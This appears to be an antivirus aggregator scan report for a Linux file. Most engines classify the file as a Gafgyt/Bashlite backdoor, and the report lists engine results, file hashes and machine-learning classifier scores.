result: Unix.Trojan.Gafgyt-111
update: 20190307
version: 0.101.1.0
detected: True check_circle

Comodo
result: Malware@#13l2ynv6c346i
update: 20190308
version: 30536
detected: True check_circle

Ikarus
result: Trojan.Linux.Gafgyt
update: 20190307
version: 0.1.5.2
detected: True check_circle

McAfee
result: Linux/Gafgyt.a
update: 20190308
version: 6.0.6.653
detected: True check_circle

Rising
result: Backdoor.Gafgyt/Linux!1.A512 (CLASSIC)
update: 20190308
version: 25.0.0.24
detected: True check_circle

Sophos
result: Linux/DDoS-BI
update: 20190308
version: 4.98.0
detected: True check_circle

Yandex
update: 20190306
version: 5.5.1.3
detected: False cancel

Arcabit
result: Trojan.Backdoor.Linux.Gafgyt.1
update: 20190308
version: 1.0.0.837
detected: True check_circle

Babable
update: 20180918
version: 9107201
detected: False cancel

TACHYON
update: 20190308
version: 2019-03-08.01
detected: False cancel

Tencent
result: backdoor.linux.gafgyt.z
update: 20190308
version: 1.0.0.1
detected: True check_circle

ViRobot
update: 20190308
version: 2014.3.20.0
detected: False cancel

Ad-Aware
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20190308
version: 3.0.5.370
detected: True check_circle

AegisLab
update: 20190308
version: 4.2
detected: False cancel

Emsisoft
result: Gen:Variant.Backdoor.Linux.Gafgyt.1 (B)
update: 20190308
version: 2018.4.0.1029
detected: True check_circle

F-Secure
result: Malware.DDOS/LNX.Lightaidra.rddnf
update: 20190308
version: 12.0.86.52
detected: True check_circle

Fortinet
result: ELF/Gafgyt.BJ!tr
update: 20190308
version: 5.4.247.0
detected: True check_circle

Jiangmin
result: Backdoor.Linux.gbf
update: 20190308
version: 16.0.100
detected: True check_circle

Kingsoft
update: 20190308
version: 2013.8.14.323
detected: False cancel

AhnLab-V3
result: Linux/Gafgyt.Gen
update: 20190308
version: 3.14.1.22785
detected: True check_circle

Antiy-AVL
result: Trojan[Backdoor]/Linux.Gafgyt.f
update: 20190308
version: 3.0.0.1
detected: True check_circle

Kaspersky
result: HEUR:Backdoor.Linux.Gafgyt.ac
update: 20190308
version: 15.0.1.13
detected: True check_circle

Microsoft
result: DDoS:Linux/Lightaidra
update: 20190307
version: 1.1.15700.9
detected: True check_circle

Qihoo-360
result: Win32/Backdoor.263
update: 20190308
version: 1.0.0.1120
detected: True check_circle

TheHacker
update: 20190304
version: 6.8.0.5.4035
detected: False cancel

ZoneAlarm
result: HEUR:Backdoor.Linux.Gafgyt.ac
update: 20190308
version: 1.0
detected: True check_circle

ESET-NOD32
result: a variant of Linux/Gafgyt.C
update: 20190308
version: 18992
detected: True check_circle

BitDefender
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20190308
version: 7.2
detected: True check_circle

K7AntiVirus
update: 20190308
version: 11.32.30218
detected: False cancel

SentinelOne
result: static engine - malicious
update: 20190203
version: 1.0.23.276
detected: True check_circle

Avast-Mobile
result: ELF:DDoS-S [Trj]
update: 20190307
version: 190307-04
detected: True check_circle

Malwarebytes
update: 20190308
version: 2.1.1.1115
detected: False cancel

TotalDefense
update: 20190307
version: 37.1.62.1
detected: False cancel

CAT-QuickHeal
result: Exploit.Linux.Shellshock.A
update: 20190306
version: 14.00
detected: True check_circle

NANO-Antivirus
result: Trojan.Elf32.Gafgyt.eikqfj
update: 20190308
version: 1.0.134.24576
detected: True check_circle

MicroWorld-eScan
result: Gen:Variant.Backdoor.Linux.Gafgyt.1
update: 20190308
version: 14.0.297.0
detected: True check_circle

SUPERAntiSpyware
update: 20190307
version: 5.6.0.1032
detected: False cancel

McAfee-GW-Edition
result: Linux/Gafgyt.a
update: 20190308
version: v2017.3010
detected: True check_circle

TrendMicro-HouseCall
result: ELF_BASHLITE.SMC
update: 20190308
version: 10.0.0.1040
detected: True check_circle

total
54
sha256
27f248d86f9942081878a3c87d2b8888c0ec6811ca4b89a58b6a5f2d844e8853
scan_id
27f248d86f9942081878a3c87d2b8888c0ec6811ca4b89a58b6a5f2d844e8853-1552027301
resource
89872aeff8396a2e86aab447c86f5394
positives
35
scan_date
2019-03-08 06:41:41
verbose_msg
Scan finished, information embedded
response_code
1
Binary
RF
confidence: 100.00%
suspicious: True check_circle
MLP
confidence: 99.98%
suspicious: True check_circle
SVM
confidence: 98.80%
suspicious: True check_circle